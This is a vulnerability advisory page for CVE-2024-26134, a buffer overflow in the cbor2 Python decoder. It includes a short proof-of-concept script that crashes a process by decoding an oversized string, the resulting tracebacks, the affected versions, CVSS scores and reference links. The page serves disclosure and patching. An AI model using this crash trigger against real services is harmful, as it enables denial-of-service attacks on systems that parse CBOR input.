CVE-2024-26134
HIGH7.5EPSS 1.1%Potential buffer overflow in CBOR2 decoder
Description
### Summary Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still) ## Details ### PoC ```py import json import concurrent.futures import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) with concurrent.futures.ProcessPoolExecutor() as executor: future = executor.submit(test) print(future.result()) ``` ``` malloc(): unsorted double linked list corrupted Traceback (most recent call last): File "test.py", line 14, in <module> print(future.result()) File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result return self.__get_result() File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result raise self._exception concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending. ``` If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow. ```py import json import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) print(test()) ``` ``` Traceback (most recent call last): File "test.py", line 12, in <module> print(test()) File "test.py", line 9, in test return cbor2.loads(cbor_enc) SystemError: <built-in function loads> returned NULL without setting an error ``` ### Impact An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
Affected packages (3)
- Debian/cbor2from 0, < 5.6.2-1
- PyPI/cbor2>= 5.5.1, < 5.6.2
- PyPI/cbor2from 0, < 387755eacf0be35591a478d3c67fe10618a6d542, < 4de6991ba29bf2290d7b9d83525eda7d021873df, < 387755eacf0be35591a478d3c67fe10618a6d542, < 4de6991ba29bf2290d7b9d83525eda7d021873df | >= 5.5.1, < 5.6.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
References (15)
- ADVISORYhttps://lists.fedoraproject.org/archives/list/[email protected]/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/
- ADVISORYhttps://lists.fedoraproject.org/archives/list/[email protected]/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/
- ADVISORYhttps://lists.fedoraproject.org/archives/list/[email protected]/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-26134
- ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2024-26134
- PATCHhttps://github.com/agronholm/cbor2
- WEBhttps://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542
- WEBhttps://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df
- WEBhttps://github.com/agronholm/cbor2/pull/204
- WEBhttps://github.com/agronholm/cbor2/releases/tag/5.6.2
- WEBhttps://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m
- WEBhttps://github.com/pypa/advisory-database/tree/main/vulns/cbor2/PYSEC-2024-155.yaml
- WEBhttps://lists.fedoraproject.org/archives/list/[email protected]/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5
- WEBhttps://lists.fedoraproject.org/archives/list/[email protected]/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ
- WEBhttps://lists.fedoraproject.org/archives/list/[email protected]/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY